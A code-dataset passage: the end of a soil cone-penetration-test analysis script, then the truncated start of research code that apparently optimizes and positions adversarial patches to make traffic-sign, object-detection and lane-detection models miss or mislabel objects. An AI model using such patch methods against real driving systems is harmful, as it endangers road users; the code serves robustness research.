sigma_vo_eff, hydroPressure = self.InSituStress()\n        return np.transpose(np.array([self.dz, self.qt, self.pw, self.qc, self.wg, self.qs, sigma_vo, sigma_vo_eff, hydroPressure, Isbt, Su]))\n\n    def addSleeveResistance(self):\n        product = []\n        for i, j in zip(self.qc, self.wg):\n            product.append(i * j)\n        return product\n\n    def asDataFrame(self):\n        a = self.asNumpy()\n        return pd.DataFrame(data=a, columns=['depth', 'qt', 'fs', 'qc', 'wg', 'qs', 'sigma_vo', 'sigma_vo_eff', 'u0', 'Isbt', 'Su'])\n\n    def Robertson(self):\n        Pa = 0.1  #MPa\n        quotient = [n / Pa for n in self.qc]\n        Isbt = ((3.47 - np.log10(quotient))**2 + (np.log10(self.wg) + 1.22)**2)**0.5  #wg can contain a 0\n        return Isbt\n\n    def HydraulicConductivity(self):\n        Isbt = self.Robertson()\n        for i in Isbt:\n            if i < 3.27:\n                k = 10**(0.952 - 3.04 * i)  #m/s\n            elif i > 3.27 and i < 4:\n                k = 10**(-4.52 - 1.37 * i)  #m/s\n            else:\n                print(\"can't compute k\")\n                k = 0\n            self.k.append(k)\n\n    def u_porepressure(self):\n        gamma_water = 9.81  #kN/m^3\n        wrong = self.dz[0]\n        corrected = 0  #assuming the water table is at ground level\n        constant = wrong + corrected\n        height_lst = -np.subtract(self.dz, constant)\n        hydroPressure = [n * gamma_water for n in height_lst]\n        hydroPressure = [n / 1000 for n in hydroPressure]\n        return hydroPressure\n\n    def Soilpressures(self):\n        wg = self.wg\n        qc = self.qc\n        gam_ref = 19 * np.ones(len(wg))\n        qt_ref = 5 * np.ones(len(wg))\n        Rf_ref = 30 * np.ones(len(wg))\n        beta = 4.12 * np.ones(len(wg))\n        gamma_sat = (gam_ref - beta * ((np.log10(qt_ref / qc)) / (Rf_ref / wg))) / 1000\n        CorHeightlst = np.abs(self.dz - self.dz[0] * np.ones(len(self.dz)))\n        sigma_vo = gamma_sat * CorHeightlst\n        return sigma_vo\n\n    def InSituStress(self):\n        hydroPressure = self.u_porepressure()\n        sigma_vo = self.Soilpressures()\n        sigma_vo_eff = np.subtract(sigma_vo, hydroPressure)\n        sigma_vo = np.nan_to_num(sigma_vo)\n        sigma_vo_eff = np.nan_to_num(sigma_vo_eff)\n        return sigma_vo, sigma_vo_eff, hydroPressure\n\n    def TotConeResistance(self):\n        #u2 is needed here instead of u0\n        #TODO: raise an error when u2 does not exist; in that case qt = qc\n        hydroPressure = self.u_porepressure()\n        a = 0.7  #usual value between 0.6-0.85 to remove adverse effects of the uneven shape of the cone\n        product = [n * (1 - a) for n in hydroPressure]\n        #print(\"Product\", hydroPressure)\n        qt = [sum(x) for x in zip(self.qc, product)]\n        return qt\n\n    def NetConePressure(self):\n        qt = self.TotConeResistance()\n        sigma_vo, sigma_vo_eff, hydroPressure = self.InSituStress()\n        qn = np.subtract(qt, sigma_vo)\n        return qn\n\n    def Normalization(self):  #Doesn't work, negative 
Qt, thus NaN for Ic\n sigma_vo,sigma_vo_eff,hydroPressure = self.InSituStress()\n qt = self.TotConeResistance()\n Qt=(qt-sigma_vo)/sigma_vo_eff\n Fr= self.pw/(qt-sigma_vo)*100\n Ic = ((3.47-np.log10(Qt)**2)+np.log10(Fr+1.22)**2)**0.5\n return Qt,Fr,Ic \n \n # def Average_qt(self):\n # df = self.asDataFrame2()\n # d = df['depth']\n # qt = df['qt']\n # window_size = 8 #improve with calculation #cone is 164mm long\n # i = 0\n # moving_averages = []\n # d.drop(d.tail(window_size-1).index,inplace=True) # drop last n rows\n \n # while i < len(qt) - window_size + 1:\n # this_window = qt[i : i + window_size]\n \n # window_average = sum(this_window) / window_size\n # moving_averages.append(window_average)\n # i += 1\n # qt_avg = moving_averages\n # return qt_avg,d\n \n def UndrainedShearStrength(self):\n sigma_vo,sigma_vo_eff,hydroPressure = self.InSituStress()\n qt = self.TotConeResistance()\n #qt = self.TotConeResistance()\n Nkt = 12*np.ones(len(sigma_vo)) #range 10-18, sometimes even 6 for weak soft soils\n Su = np.subtract(qt,sigma_vo)/Nkt\n Su = np.nan_to_num(Su)\n return Su\n \n def SoilSensitivity(self):\n Su = self.UndrainedShearStrength()\n for i in range(len(self.pw)):\n if self.pw[i] <0.01:\n self.pw[i]=np.nan\n St = Su * ((1*np.ones(len(self.pw)))/self.pw)\n return St\n \n def SBTplot(self,filename):\n Ic = self.Robertson()\n index = []\n for i in range(len(Ic)):\n if Ic[i] > 3.6:\n index.append(2)\n elif Ic[i] > 2.95 and Ic[i] <=3.6:\n index.append(3)\n elif Ic[i] > 2.60 and Ic[i] <=2.95:\n index.append(4)\n elif Ic[i] > 2.05 and Ic[i] <=2.60:\n index.append(5)\n elif Ic[i] > 1.31 and Ic[i] <=2.05:\n index.append(6)\n else:\n index.append(7)\n z = int(self.dz[-1])\n ylim = z+1\n\n fig = plt.figure(figsize=(30,15))\n ax1 = fig.add_subplot(131)\n ax1.plot(self.qc,self.dz,color='black', label=\"qc\")\n ax1.set_ylim(0,ylim)\n ax1.set_xlim(0,55.0)\n \n ax1.invert_yaxis()\n ax1.minorticks_on()\n ax1.grid(True, which='both')\n ax1.legend(loc=3)\n ax1.set_ylabel(\"depth (m)\",size=12)\n ax1.set_xlabel(\"qc (MPa)\",size=12)\n \n ax2 = ax1.twiny()\n ax2.plot(self.wg,self.dz,color='green', label=\"wg\")\n ax2.set_ylim(0,ylim)\n ax2.set_xlim(0,25.0)\n ax2.invert_xaxis()\n ax2.invert_yaxis()\n ax2.set_xlabel(\"wg (%)\",size=12)\n \n ax3 = fig.add_subplot(132)\n ax3.plot(Ic,self.dz,color='yellow',linewidth=2)\n ax3.set_ylim(0,ylim)\n ax3.set_xlim(1.0,4.0)\n ax3.invert_yaxis()\n ax3.text(1.05, -9.8, \"gravel - dense sand\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(1.55, -9.8, \"clean sand - silty sand\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(2.22, -9.8, \"silty sand - sandy silt\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(2.65, -9.8, \"clayey silt - silty clay\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(3.2, -9.8, \"silty clay - clay\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(3.65, -9.8, \"peat\", va='bottom', rotation=90, size=17, color=\"white\")\n\n ax3.add_patch(patches.Rectangle((0,0),1.31,ylim,facecolor='darkgoldenrod'))\n ax3.add_patch(patches.Rectangle((1.31,0),0.74,ylim,facecolor='goldenrod'))\n ax3.add_patch(patches.Rectangle((2.05,0),0.55,ylim,facecolor='mediumseagreen'))\n ax3.add_patch(patches.Rectangle((2.60,0),0.35,ylim,facecolor='seagreen'))\n ax3.add_patch(patches.Rectangle((2.95,0),0.65,ylim,facecolor='cadetblue'))\n ax3.add_patch(patches.Rectangle((3.6,0),0.4,ylim,facecolor='sienna'))\n ax3.yaxis.grid(which=\"minor\")\n ax3.yaxis.grid(which=\"major\")\n 
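# the colored bands drawn above follow the Robertson Isbt soil-behaviour-type boundaries at 1.31, 2.05, 2.60, 2.95 and 3.6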
ax3.xaxis.grid(which=\"major\")\n ax3.minorticks_on()\n\n ax3.set_xlabel(\"Ic SBT\",size=12)\n ax3.set_ylabel(\"depth (m)\")\n \n ax4 = fig.add_subplot(133)\n for i in range(len(Ic)-1):\n if index[i+1] == 2:\n colour = 'sienna'\n elif index[i+1] == 3:\n colour = 'cadetblue'\n elif index[i+1] == 4:\n colour = 'seagreen'\n elif index[i+1] == 5:\n colour = 'mediumseagreen'\n elif index[i+1] == 6:\n colour = 'goldenrod'\n elif index[i+1] == 7:\n colour = 'darkgoldenrod'\n ax4.add_patch(patches.Rectangle((0,self.dz[i]),index[i+1],(0.1),facecolor=colour))\n ax4.set_ylim(0,ylim)\n ax4.set_xlim(0,10.0)\n ax4.set_ylabel(\"depth (m)\")\n ax4.invert_yaxis()\n ax4.yaxis.grid(which=\"major\")\n ax4.yaxis.grid(which=\"minor\")\n ax4.xaxis.grid(which=\"major\")\n ax4.minorticks_on()\n \n plt.savefig(filename)\n plt.close(None)\n \n def plot(self, filename): \n df = self.asDataFrame()\n fig, axes = plt.subplots(nrows=1, ncols=6, figsize=(20,12), gridspec_kw = {'width_ratios':[3, 1, 2, 1, 1,1]})\n axes[0].set_xlim([0,40])\n df.plot(x='qc', y='depth', ax=axes[0], sharey=True, label='qc, cone resistance [MPa]')\n df.plot(x='qt', y='depth', ax=axes[0], sharey=True, label='qt, corrected cone resistance [MPa]')\n df.plot(x='fs', y='depth', ax=axes[1], sharey=True, label='fs, local/friction resistance [MPa]')\n df.plot(x='wg', y='depth', ax=axes[2], sharey=True, label='wg, friction ratio [%]')\n df.plot(x='qs', y='depth', ax=axes[3], sharey=True, label='qs, sleeve resistane[kPa]')\n df.plot(x='u0', y='depth', ax=axes[4], sharey=True, label='u0, water pressure[MPa]')\n df.plot(x='Isbt', y='depth',ax=axes[5], sharey=True, label='Isbt, non-normalized Soil behaviour Type index')\n\n \n for i in range(6): axes[i].grid()\n plt.savefig(filename)\n plt.close(None)\n \n\nretval,files,cwd = readFiles()\npurpose = 'export'\n\n\n\ndef LoopReader(retval,file,purpose,cwd):\n path ='\\CPTs'\n os.chdir(cwd+path)\n if __name__==\"__main__\":\n g = GEF()\n g.readFile(file)\n file = file.strip('.gef')\n print(file)\n if purpose == 'export':\n Export_df = g.asDataFrame()\n filename = str(file) + '.feather'\n os.chdir(cwd) \n feather.write_dataframe(Export_df, filename)\n print(\"Finished exporting data\")\n elif purpose =='plot':\n os.chdir(cwd)\n g.plot(file + \"_graphs_1.png\")\n # g.plot2(file + '_graphs_2.png')\n g.SBTplot(file+\"_SBT.png\")\n print(\"Finished plotting graphs\")\n else:\n print(\"Purpose not found\")\n\nfor i in files:\n LoopReader(retval,i,purpose,cwd)\n\n\nprint(\"Total runtime:\",datetime.datetime.now() - begin_time)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Arian125/thesis","sub_path":"CPT_reader.py","file_name":"CPT_reader.py","file_ext":"py","file_size_in_byte":13772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73657848553","text":"from __future__ import division\nimport os\nos.environ['CUDA_VISIBLE_DEVICES']='1'\n\nimport warnings\nwarnings.filterwarnings('ignore')\nwarnings.simplefilter('ignore')\n\nimport cv2\nimport argparse\nfrom PIL import Image\nimport shutil\nfrom io import BytesIO\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torchvision\nfrom torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom pytorch_grad_cam import EigenCAM\nfrom pytorch_grad_cam.utils.image import show_cam_on_image, scale_cam_image\nfrom pytorch_grad_cam.utils.model_targets import ClassifierOutputTarget\nfrom torch.optim.lr_scheduler import 
ReduceLROnPlateau\n\nfrom models_TS import *\nfrom utils_TS.utils_TS import *\nfrom utils_TS.datasets_TS import *\nfrom utils_TS.utils_TS import rescale_boxes_TS\nfrom utils_TS.datasets_TS import resize_TS\n\nfrom models_OD import *\nfrom utils_OD.utils_OD import *\nfrom utils_OD.datasets_OD import *\n\nfrom model_RL import SCNN\nfrom utils_RL.utils import *\nfrom utils_RL.prob2lines import getLane\nfrom utils_RL.transforms import *\nfrom torchvision import utils as vutils\n\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.ticker import NullLocator\nfrom ALL_sign_data.resnet import ResNet18\nfrom tqdm import tqdm\n\nfrom attention_RL import GradCAMTensor\n\nimport pandas as pd\nimport csv\n\nimport wandb\n\nclass SegmentationModelOutputWrapper(torch.nn.Module):\n # 改变模型的输出格式来匹配GradCAMTensor\n def __init__(self, model): \n super(SegmentationModelOutputWrapper, self).__init__()\n self.model = model\n self.exist_pred = None\n\n def forward(self, x):\n seg_pred, exist_pred = self.model(x)[:2]\n self.exist_pred = exist_pred.detach().cpu().numpy()\n return seg_pred\n\nclass SemanticSegmentationTarget:\n def __init__(self, category, mask):\n self.category = category\n self.mask = torch.from_numpy(mask)\n if torch.cuda.is_available():\n self.mask = self.mask.cuda()\n \n def __call__(self, model_output):\n return (model_output[self.category, :, : ] * self.mask).sum()\n\nclass ActivationsAndGradientsNotDetached:\n \"\"\" Class for extracting activations and\n registering gradients from targetted intermediate layers \"\"\"\n\n def __init__(self, model, target_layers, reshape_transform):\n self.model = model\n self.gradients = []\n self.activations = []\n self.reshape_transform = reshape_transform\n self.handles = []\n for target_layer in target_layers:\n self.handles.append(\n target_layer.register_forward_hook(self.save_activation))\n # Because of https://github.com/pytorch/pytorch/issues/61519,\n # we don't use backward hook to record gradients.\n self.handles.append(\n target_layer.register_forward_hook(self.save_gradient))\n\n def save_activation(self, module, input, output):\n activation = output\n\n if self.reshape_transform is not None:\n activation = self.reshape_transform(activation)\n self.activations.append(activation)\n\n def save_gradient(self, module, input, output):\n if not hasattr(output, \"requires_grad\") or not output.requires_grad:\n # You can only register hooks on tensor requires grad.\n return\n\n # Gradients are computed in reverse order\n def _store_grad(grad):\n if self.reshape_transform is not None:\n grad = self.reshape_transform(grad)\n self.gradients = [grad] + self.gradients\n\n output.register_hook(_store_grad)\n\n def __call__(self, x):\n self.gradients = []\n self.activations = []\n return self.model(x)\n\n def release(self):\n for handle in self.handles:\n handle.remove()\n\nclass RemainTensor(EigenCAM):\n def __init__(self, model, target_layers, use_cuda=False, reshape_transform=None):\n super().__init__(model, target_layers, use_cuda, reshape_transform)\n self.activations_and_grads = ActivationsAndGradientsNotDetached(\n self.model, target_layers, reshape_transform)\n \n def forward(self, input_tensor: torch.Tensor, targets: List[torch.nn.Module], eigen_smooth: bool = False) -> torch.Tensor:\n if self.cuda:\n input_tensor = input_tensor.cuda()\n\n if self.compute_input_gradient:\n input_tensor = torch.autograd.Variable(input_tensor,\n requires_grad=True)\n\n outputs = 
self.activations_and_grads(input_tensor)\n if len(outputs)>1: outputs=outputs[0] # modified to adapt to yolov3\n if targets is None: # here to modify target class!!\n target_categories = np.argmax(outputs.cpu().data.numpy(), axis=-1)\n targets = [ClassifierOutputTarget(\n category) for category in target_categories]\n\n if self.uses_gradients:\n self.model.zero_grad()\n loss = sum([target(output)\n for target, output in zip(targets, outputs)])\n loss.backward(retain_graph=True)\n\n # In most of the saliency attribution papers, the saliency is\n # computed with a single target layer.\n # Commonly it is the last convolutional layer.\n # Here we support passing a list with multiple target layers.\n # It will compute the saliency image for every image,\n # and then aggregate them (with a default mean aggregation).\n # This gives you more flexibility in case you just want to\n # use all conv layers for example, all Batchnorm layers,\n # or something else.\n cam_per_layer = self.compute_cam_per_layer(input_tensor,\n targets,\n eigen_smooth)\n return self.aggregate_multi_layers(cam_per_layer)\n\n def compute_cam_per_layer(\n self,\n input_tensor: torch.Tensor,\n targets: List[torch.nn.Module],\n eigen_smooth: bool) -> torch.Tensor:\n activations_list = [a\n for a in self.activations_and_grads.activations] # here required grad is False!!\n grads_list = [g\n for g in self.activations_and_grads.gradients]\n target_size = self.get_target_width_height(input_tensor)\n\n cam_per_target_layer = []\n # Loop over the saliency image from every layer\n for i in range(len(self.target_layers)):\n target_layer = self.target_layers[i]\n layer_activations = None\n layer_grads = None\n if i < len(activations_list):\n layer_activations = activations_list[i]\n if i < len(grads_list):\n layer_grads = grads_list[i]\n\n cam = self.get_cam_image(layer_activations)\n cam2 = []\n for ca in cam:\n cam2.append(torch.maximum(ca, torch.tensor(0)))\n cam = cam2\n # cam = torch.maximum(cam, 0)\n scaled = self.scale_cam_image(cam, target_size)\n cam_per_target_layer.append(scaled[0])\n\n return cam_per_target_layer\n\n def scale_cam_image(self,cam,target_size=None):\n result = []\n for img in cam:\n img = img - torch.min(img)\n img = img / (1e-7 + torch.max(img))\n if target_size is not None:\n img=img.reshape(1,1,img.shape[0],img.shape[1])\n img=F.interpolate(img,size=target_size,mode='bilinear')\n # img = img.resize(target_size)\n result.append(img)\n # result = result.type(torch.float32)\n return result\n\n \n def get_cam_image(self, activation_batch):\n # TBD: use pytorch batch svd implementation\n activation_batch[torch.isnan(activation_batch)] = 0\n projections = []\n for activations in activation_batch:\n reshaped_activations = (activations).reshape(\n activations.shape[0], -1).T\n # Centering before the SVD seems to be important here,\n # Otherwise the image returned is negative\n reshaped_activations = reshaped_activations - \\\n reshaped_activations.mean(axis=0)\n U, S, VT = torch.linalg.svd(reshaped_activations, full_matrices=True)\n projection = reshaped_activations @ VT[0, :]\n projection = projection.reshape(activations.shape[1:])\n projections.append(projection)\n return projections\n \n def aggregate_multi_layers(\n self,\n cam_per_target_layer: torch.tensor) -> torch.tensor:\n cam_per_target_layer = torch.cat(cam_per_target_layer, axis=1)\n cam_per_target_layer = torch.maximum(cam_per_target_layer, torch.tensor(0))\n result = torch.mean(cam_per_target_layer, axis=1)\n return self.scale_cam_image(result)\n\nclass 
MyOptimizer(Optimizer):\n    def __init__(self, params, lr) -> None:\n        # self.lr = lr\n        super().__init__(params, {})\n        self.param_groups[0]['lr'] = lr\n\n    def step(self, closure=False):\n        for param_group in self.param_groups:\n            params = param_group['params']\n            lr = param_group['lr']\n            # pull the parameters out of this param_group\n            for param in params:\n                # update each parameter in turn, clipping it back into [0, 1]\n                param.data = np.clip(param.data - lr * param.grad, 0, 1)\n\ndef classify_draw_TS(dir_, img_show, img_class, detections, nums, step=1):\n    fig, ax = plt.subplots()\n    j = 0\n    objects = []\n    for i, (x1, y1, x2, y2, conf, cls_conf, cls_pred) in enumerate(detections):  # one object in an image\n        x1 = int(x1)\n        y1 = int(y1)\n        x2 = int(x2)\n        y2 = int(y2)\n        box_w = x2 - x1\n        box_h = y2 - y1\n        min_sign_size = 3\n        size_show = int(100*img_show.size[0]/2048)\n        # print(\"box info x1,y1,x2,y2:\\n\", x1, y1, x2, y2)\n        if box_w >= min_sign_size and box_h >= min_sign_size and conf >= 0.94:\n            # print(conf, cls_conf)\n            crop_sign_org = img_class.crop((x1-10, y1-10, x2+10, y2+10)).convert(mode=\"RGB\")\n            ##### to class ###############\n            test_transform = torchvision.transforms.Compose([\n                torchvision.transforms.Resize((28, 28), interpolation=2),\n                torchvision.transforms.ToTensor(),\n                torchvision.transforms.Normalize(mean=[0.5], std=[0.5])\n            ])\n            crop_sign_input = test_transform(crop_sign_org).unsqueeze(0)\n            with torch.no_grad():\n                pred_class = model_class_TS(crop_sign_input.to(device))\n            # the output holds a confidence score per class; in practice the correct class scores above 1 and the others are negative\n            # print(\"classifier output: \", torch.max(pred_class, 1))\n            sign_type = torch.max(pred_class, 1)[1].to(\"cpu\").numpy()[0]\n            # print(cls_pred)\n            # overwrite the detector label with the classifier result -------------------------------------------\n            cls_pred = sign_type\n\n            # print(\"cls_pred_type = \", classes_TS[int(cls_pred)])#, \" cls_conf = \", cls_conf)\n            # #####\n            # draw image\n            # #####\n            if True and classes_TS[int(cls_pred)] != \"zo\":\n                # save predict results to a json file: my_train_results.json\n                objects.append([int(cls_pred), x1, y1, x2, y2])\n\n                color = \"r\"\n\n                bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=1, edgecolor=color, facecolor=\"none\")\n                ax.add_patch(bbox)\n\n                pad_sign_path_png = \"ALL_sign_data/pad-all/\" + classes_TS[int(cls_pred)] + \".png\"\n                pad_sign_path_jpg = \"ALL_sign_data/pad-all/\" + classes_TS[int(cls_pred)] + \".jpg\"\n                if os.path.isfile(pad_sign_path_png):\n                    pad_sign = Image.open(pad_sign_path_png)\n                elif os.path.isfile(pad_sign_path_jpg):\n                    pad_sign = Image.open(pad_sign_path_jpg)\n                else:\n                    pad_sign = Image.new(\"RGB\", (size_show, size_show), (255, 255, 255))\n\n                img_show.paste(crop_sign_org.resize((size_show, size_show)), (0, j * size_show))\n                img_show.paste(pad_sign.resize((size_show, size_show)), (size_show, j * size_show))\n                j += 1\n\n    # Save generated image with detections\n    ax.imshow(img_show)\n    plt.axis(\"off\")\n    plt.gca().xaxis.set_major_locator(NullLocator())\n    plt.gca().yaxis.set_major_locator(NullLocator())\n    buffer = BytesIO()\n    plt.savefig(buffer, format='png')\n    img_upload = np.asarray(Image.open(buffer))\n\n    plt.close()\n    return objects, img_upload\n\ndef compute_loss(cam_now, cam_orient, option):\n    '''\n    option: 1 -> variance; 2 -> L2 norm of the difference; 3 -> L1 norm of the difference\n    '''\n    if option == 1:\n        # variance\n        loss = torch.var(cam_now, unbiased=False)\n    elif option == 2:\n        # L2 norm of the difference\n        loss = torch.norm(cam_now - cam_orient, p=2)\n    elif option == 3:\n        loss = torch.norm(cam_now - cam_orient, p=1)\n    else:\n        loss = torch.var(cam_now, unbiased=False)\n    return loss\n\ndef Iou_TS(box1, box2, wh=False):
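\n    # intersection-over-union of two axis-aligned boxes; with wh=True each box is given as\n    # (center_x, center_y, width, height) rather than as corner coordinates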
\n    if wh == False:\n        xmin1, ymin1, xmax1, ymax1 = box1\n        xmin2, ymin2, xmax2, ymax2 = box2\n    else:\n        xmin1, ymin1 = int(box1[0]-box1[2]/2.0), int(box1[1]-box1[3]/2.0)\n        xmax1, ymax1 = int(box1[0]+box1[2]/2.0), int(box1[1]+box1[3]/2.0)\n        xmin2, ymin2 = int(box2[0]-box2[2]/2.0), int(box2[1]-box2[3]/2.0)\n        xmax2, ymax2 = int(box2[0]+box2[2]/2.0), int(box2[1]+box2[3]/2.0)\n    # top-left and bottom-right corners of the intersection rectangle\n    xx1 = max([xmin1, xmin2])\n    yy1 = max([ymin1, ymin2])\n    xx2 = min([xmax1, xmax2])\n    yy2 = min([ymax1, ymax2])\n    # areas of the two boxes\n    area1 = (xmax1-xmin1) * (ymax1-ymin1)\n    area2 = (xmax2-xmin2) * (ymax2-ymin2)\n    inter_area = (max([0, xx2-xx1])) * (max([0, yy2-yy1]))  #intersection area\n    iou = inter_area / (area1+area2-inter_area+1e-6)  #intersection over union\n    return iou\n\ndef Iou_OD(box1, box2, wh=False):\n    if wh == False:\n        xmin1, ymin1, xmax1, ymax1 = box1\n        xmin2, ymin2, xmax2, ymax2 = box2\n    else:\n        xmin1, ymin1 = int(box1[0]-box1[2]/2.0), int(box1[1]-box1[3]/2.0)\n        xmax1, ymax1 = int(box1[0]+box1[2]/2.0), int(box1[1]+box1[3]/2.0)\n        xmin2, ymin2 = int(box2[0]-box2[2]/2.0), int(box2[1]-box2[3]/2.0)\n        xmax2, ymax2 = int(box2[0]+box2[2]/2.0), int(box2[1]+box2[3]/2.0)\n    # top-left and bottom-right corners of the intersection rectangle\n    xx1 = max([xmin1, xmin2])\n    yy1 = max([ymin1, ymin2])\n    xx2 = min([xmax1, xmax2])\n    yy2 = min([ymax1, ymax2])\n    # areas of the two boxes\n    area1 = (xmax1-xmin1) * (ymax1-ymin1)\n    area2 = (xmax2-xmin2) * (ymax2-ymin2)\n    inter_area = (max([0, xx2-xx1])) * (max([0, yy2-yy1]))  #intersection area\n    iou = inter_area / (area1+area2-inter_area+1e-6)  #intersection over union\n\n    return iou\n\ndef Miss_Generation_Misdetect_TS(obj_0, obj_i):\n    # each entry: [int(cls_pred), x1, y1, x2, y2]\n    len0 = len(obj_0)\n    leni = len(obj_i)\n    cls0 = [x[0] for x in obj_0]\n    clsi = [x[0] for x in obj_i]\n    x10 = [x[1] for x in obj_0]\n    x1i = [x[1] for x in obj_i]\n    y10 = [x[2] for x in obj_0]\n    y1i = [x[2] for x in obj_i]\n    x20 = [x[3] for x in obj_0]\n    x2i = [x[3] for x in obj_i]\n    y20 = [x[4] for x in obj_0]\n    y2i = [x[4] for x in obj_i]\n    miss = 0\n    generation = 0\n    misdetect = 0\n    if len0 > leni:\n        miss = 1\n    elif len0 < leni:\n        generation = 1\n    Ismisclass = [0]*len0\n    IsMiss = [0]*len0\n    Isgeneration = [0]*len0\n    for i in range(len0):\n        i_misclass = 0\n        i_mis = 1\n        i_difpos = 1\n        for j in range(leni):\n            iou = Iou_TS([x10[i], y10[i], x20[i], y20[i]], [x1i[j], y1i[j], x2i[j], y2i[j]])\n            if iou > 0.4:  # same position\n                # input()\n                i_difpos = 0  # a same-position match counts as a misdetection or a miss, never as generation\n                if clsi[j] != cls0[i]:  #same position, different label: misdetection\n                    i_misclass += 1\n                else:  # same position, same label, so no miss\n                    i_mis = 0\n        Ismisclass[i] = bool(i_misclass)\n        IsMiss[i] = bool(i_mis)\n        Isgeneration[i] = bool(i_difpos)\n\n    miss = bool(miss + sum(IsMiss))\n    generation = bool(generation + sum(Isgeneration))\n    misdetect = bool(misdetect + sum(Ismisclass))\n    return miss, misdetect, generation\n\ndef IsMisMisGen_OD(boxinfo_list0, n0, boxinfo_list, n):\n    Ismisclass = [0]*(n0+1)\n    IsMiss = [0]*(n0+1)\n    Isgeneration = [0]*(n0+1)\n    if n0 > n:\n        IsMiss[-1] = 1\n    if n0 < n:\n        Isgeneration[-1] = 1\n    for i in range(n0):\n        [x1i, y1i, x2i, y2i, confi, cls_confi, cls_predi] = boxinfo_list0[i]\n        i_misclass = 0\n        i_mis = 1\n        i_difpos = 1\n        for j in range(n):\n            [x1j, y1j, x2j, y2j, confj, cls_confj, cls_predj] = boxinfo_list[j]\n            iou = Iou_OD([x1i, y1i, x2i, y2i], [x1j, y1j, x2j, y2j])\n            if iou > 0.4:  # same position\n                i_difpos = 0  # a same-position match counts as a misdetection or a miss, never as generation\n                if cls_predi != cls_predj:  #same position, different label\n                    # print(\"same position, different label\", i, j)\n                    # input()\n                    if cls_confi < cls_confj:  #lower confidence -> misclass i to j\n                        i_misclass += 1\n                else:  # same position, same label, so no miss\n                    # print(\"same position, same label\", i, j)\n                    i_mis = 0\n            # print(\"different position\", i, j)\n        Ismisclass[i] = bool(i_misclass)\n        IsMiss[i] = bool(i_mis)\n        Isgeneration[i] = bool(i_difpos)\n\n    return bool(sum(IsMiss)), bool(sum(Ismisclass)), bool(sum(Isgeneration))\n\ndef setposition_OD(boxinfo_list):\n    x1 = []\n    y1 = []\n    x2 = []\n    y2 = []\n    N = len(boxinfo_list)\n    for i in range(N):\n        [xx1, yy1, xx2, yy2, conf, cls_conf, cls_pred] = boxinfo_list[i]\n        x1.append(xx1.cpu().numpy())\n        y1.append(yy1.cpu().numpy())\n        x2.append(xx2.cpu().numpy())\n        y2.append(yy2.cpu().numpy())\n\n    if N > 0:\n        idx = np.random.randint(low=0, high=N)\n    else:\n        idx = 0\n\n    if x2[idx] > 365 and y1[idx] > 230:\n        pos_x1 = np.random.randint(low=x1[idx]-opt.patch_size[0]-10, high=x1[idx]-opt.patch_size[0])\n        pos_y1 = np.random.randint(low=y1[idx], high=y2[idx]-20)\n    else:
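\n        # otherwise drop the patch just below the selected box\n        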
pos_x1=np.random.randint(low=x1[idx]-opt.patch_size[0]-10,high=x2[idx]+10)\n pos_y1=np.random.randint(low=y2[idx],high=y2[idx]+10)\n \n iscox=0\n j=0\n for i in range(N):\n if x1[i]<=pos_x1+opt.patch_size[0] and x2[i]>=pos_x1 and y1[i]<=pos_y1+opt.patch_size[0] and y2[i]>=pos_y1:\n iscox=1\n\n while (iscox) or (pos_x1<0 or pos_x1+opt.patch_size[0]>416):\n j+=1\n print(\"Box crossed, try again.\")\n if x1[idx]>280 and y1[idx]>230:\n pos_x1=np.random.randint(low=x1[idx]-opt.patch_size[0]-10,high=x1[idx]-opt.patch_size[0])\n pos_y1=np.random.randint(low=y1[idx],high=y2[idx]-20)\n else:\n pos_x1=np.random.randint(low=x1[idx]-opt.patch_size[0]-10,high=x2[idx]+10)\n pos_y1=np.random.randint(low=y2[idx],high=y2[idx]+10)\n \n if j%15==0 and N>0 :\n idx=(idx+1)%N\n\n iscox=0\n for i in range(N):\n if x1[i]<=pos_x1+80 and x2[i]>=pos_x1 and y1[i]<=pos_y1+40 and y2[i]>=pos_y1:\n iscox=1\n print(\"pos_y1: \",pos_y1,\", pos_x1: \",pos_x1)\n return [pos_y1,pos_x1]\n\ndef setposition_TS(objs,img_size):\n x1=[]\n y1=[]\n x2=[]\n y2=[]\n N=len(objs)\n for k in range(N):\n x1.append(int(objs[k][1]*opt.img_size_TS/img_size))\n y1.append(int(objs[k][2]*opt.img_size_TS/img_size))\n x2.append(int(objs[k][3]*opt.img_size_TS/img_size))\n y2.append(int(objs[k][4]*opt.img_size_TS/img_size))\n \n \n idx=np.random.randint(low=0,high=N)\n \n pos_x1=np.random.randint(low=x1[idx]-100,high=x2[idx]+100)\n pos_y1=np.random.randint(low=y2[idx],high=y2[idx]+30)\n\n iscox=0\n for i in range(N):\n if x1[i]<=pos_x1+opt.patch_size[0] and x2[i]>=pos_x1 and y1[i]<=pos_y1+opt.patch_size[0] and y2[i]>=pos_y1:\n iscox=1\n j=0\n isover=0\n if (pos_x1<0 or pos_x1+opt.patch_size[0]>opt.img_size_TS or pos_y1<0 or pos_y1+opt.patch_size[0]>opt.img_size_TS):\n isover=1\n while iscox or isover :\n j+=1\n print(\"Box crossed, try again.\")\n pos_x1=np.random.randint(low=x1[idx]-90,high=x2[idx]+20)\n pos_y1=np.random.randint(low=y2[idx]+10,high=y2[idx]+30)\n if j%15==0:\n idx=(idx+1)%N\n \n iscox=0\n for i in range(N):\n if x1[i]<=pos_x1+opt.patch_size[0] and x2[i]>=pos_x1 and y1[i]<=pos_y1+opt.patch_size[0] and y2[i]>=pos_y1:\n iscox=1\n isover=0\n if (pos_x1<0 or pos_x1+opt.patch_size[0]>opt.img_size_TS or pos_y1<0 or pos_y1+opt.patch_size[0]>opt.img_size_TS):\n isover=1\n\n print(\"pos_y1: \",pos_y1,\", pos_x1: \",pos_x1)\n return [pos_y1,pos_x1]\n\ndef load_img_OD(img_path):\n '''\n 加载一张图片数据,并处理成model的输入格式;输入图片的路径\n '''\n img 